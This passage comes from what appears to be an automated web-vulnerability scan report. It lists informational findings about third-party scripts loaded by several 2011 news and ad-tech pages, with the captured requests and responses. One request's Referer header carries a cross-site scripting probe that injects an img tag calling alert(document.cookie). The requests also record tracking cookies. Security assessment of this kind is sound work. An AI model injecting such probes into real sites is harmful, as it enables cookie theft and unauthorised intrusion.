<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=ndtvsocial"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

22.31. http://social.ndtv.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /home.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home.php HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.4.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=efl9lo3odsxv1y4d; _SUPERFLY_nosample=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 22710
Expires: Sun, 04 Sep 2011 03:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:32:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div id="root">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

22.32. http://social.ndtv.com/static/Comment/Form/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14332
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:36:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

22.33. http://social.ndtv.com/tbModel/signin.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /tbModel/signin.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tbModel/signin.php HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:19:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:19:02 GMT
Content-Length: 4537
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
-->
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

22.34. http://thestar.com.my/news/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thestar.com.my
Path:   /news/story.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/story.asp HTTP/1.1
Host: thestar.com.my
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42547
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACQRSBDS=IKFLHFGBCIHPNCLAHHONEOEJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!-- PUT THIS TAG IN THE head SECTION -->
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/thestaronline/news/story;tile=1;sz=728x90;ord=?"></script>
...[SNIP]...
<div id="searchbar">
<script type="text/javascript" src="http://star-big.knorex.asia/static-classified/searchprinter.jsp"></script>
...[SNIP]...
<!-- begin ad tag (tile=3) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/thestaronline/news;tile=3;sz=120x600;ord=?"></script>
...[SNIP]...
</a>
   <script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<div id="story_tools_recommend">
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
   
<script type="text/javascript" src="http://ad.doubleclick.net/adj/thestaronline/news/story;tile=2;sz=336x280;ord=?"></script>
...[SNIP]...
</div>

                   <script src="http://star-micro.knorex.asia/static-igem/newsFeedPrinter.jsp" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://mystarjob.com/widgets/jobbox/mystarjobbox.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript" src="//secure-sg.imrworldwide.com/v60.js">
</script>
...[SNIP]...

22.35. http://tidaltv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0

Response

HTTP/1.1 200 OK
Content-Length: 6425
Content-Type: text/html
Content-Location: http://tidaltv.com/index.html
Last-Modified: Wed, 13 Apr 2011 23:15:20 GMT
Accept-Ranges: bytes
ETag: "5c63cfa830facb1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:04 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http:
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

22.36. http://tidaltv.com/PrivacyDashboard.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /PrivacyDashboard.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PrivacyDashboard.aspx HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/technology_overview.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.4.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:58:49 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1" profile="
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

22.37. http://tidaltv.com/aboutus_who.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /aboutus_who.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /aboutus_who.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/publisher_overview.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.2.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 5439
Content-Type: text/html
Last-Modified: Sun, 21 Aug 2011 23:45:58 GMT
Accept-Ranges: bytes
ETag: "e9c1f7a5c60cc1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://ww
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

22.38. http://tidaltv.com/optoutconfirm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /optoutconfirm.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /optoutconfirm.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/PrivacyDashboard.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmb=243159559.5.10.1315133926; __utmc=243159559; opt-out=true

Response

HTTP/1.1 200 OK
Content-Length: 5447
Content-Type: text/html
Last-Modified: Thu, 19 May 2011 15:17:28 GMT
Accept-Ranges: bytes
ETag: "e1ed75dd3716cc1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:53 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://w
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

22.39. http://tidaltv.com/publisher_overview.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /publisher_overview.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /publisher_overview.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.1.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 24612
Content-Type: text/html
Last-Modified: Thu, 23 Sep 2010 19:05:29 GMT
Accept-Ranges: bytes
ETag: "32aea4a525bcb1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://www
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

22.40. http://tidaltv.com/technology_overview.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tidaltv.com
Path:   /technology_overview.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /technology_overview.html HTTP/1.1
Host: tidaltv.com
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/aboutus_who.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; __utma=243159559.865671418.1315133926.1315133926.1315133926.1; __utmb=243159559.3.10.1315133926; __utmc=243159559; __utmz=243159559.1315133926.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 6684
Content-Type: text/html
Last-Modified: Thu, 23 Sep 2010 19:05:29 GMT
Accept-Ranges: bytes
ETag: "32aea4a525bcb1:8e9"
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:58:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://w
...[SNIP]...
</script>

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

22.41. http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /city/mumbai/My-friend-Ganesha/articleshow/9855193.cms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /city/mumbai/My-friend-Ganesha/articleshow/9855193.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih; _chartbeat2=8l1yir8xsllibs89

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sat, 03 Sep 2011 18:45:30 GMT
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 123410
Expires: Sun, 04 Sep 2011 02:55:28 GMT
Date: Sun, 04 Sep 2011 02:55:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><head><MET
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</noscript><script src="//secure-uk.imrworldwide.com/v60.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script><script src="http://cdna.tremormedia.com/acudeo/banners.js" type="text/javascript"></script>
...[SNIP]...

22.42. http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /city/mumbai/articlelist/-2128838597.cms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /city/mumbai/articlelist/-2128838597.cms HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
CacheControl: public
Last-Modified: Sun, 04 Sep 2011 02:20:07 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 84156
Expires: Sun, 04 Sep 2011 02:40:07 GMT
Date: Sun, 04 Sep 2011 02:29:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" ><html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Mumbai News, News in Mu
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</noscript><script src="//secure-uk.imrworldwide.com/v60.js" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

22.43. http://timesofindia.indiatimes.com/configspace/ads/TOI_mumbai_articlelist_36950_TOP.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/TOI_mumbai_articlelist_36950_TOP.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /configspace/ads/TOI_mumbai_articlelist_36950_TOP.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "35812a3d66f854bf3b6ff8733424d093:1301465551"
Last-Modified: Wed, 30 Mar 2011 06:12:31 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 3108
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:34:02 GMT
Connection: close

<html><head><title>Indiatimes - Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bottommargin="0" STYLE="background-color:transparent"><style type="text/
...[SNIP]...
</script><script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.44. http://timesofindia.indiatimes.com/configspace/ads/googleadsarticlelistbot.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/googleadsarticlelistbot.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /configspace/ads/googleadsarticlelistbot.html HTTP/1.1
Host: timesofindia.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; __utma=1.1749513380.1315103166.1315103166.1315103166.1; __utmb=1.3.10.1315103166; __utmc=1; __utmz=1.1315103166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6a90eddd8a6b5d24047960c5c457324b:1305721704"
Last-Modified: Wed, 18 May 2011 12:28:23 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 2955
Cache-Control: max-age=120
Date: Sun, 04 Sep 2011 02:34:06 GMT
Connection: close

<style type="text/css">
<!--
a{text-decoration:none}
a:hover{text-decoration: underline}
-->
</style> <script language="JavaScript">
try{
var it_showhide=[1,1,1]; //Title,Description,URL
var it_title
...[SNIP]...
</script><script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.45. http://timesofindia.indiatimes.com/configspace/ads/googleshowbtm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /configspace/ads/googleshowbtm.html

Issue detail

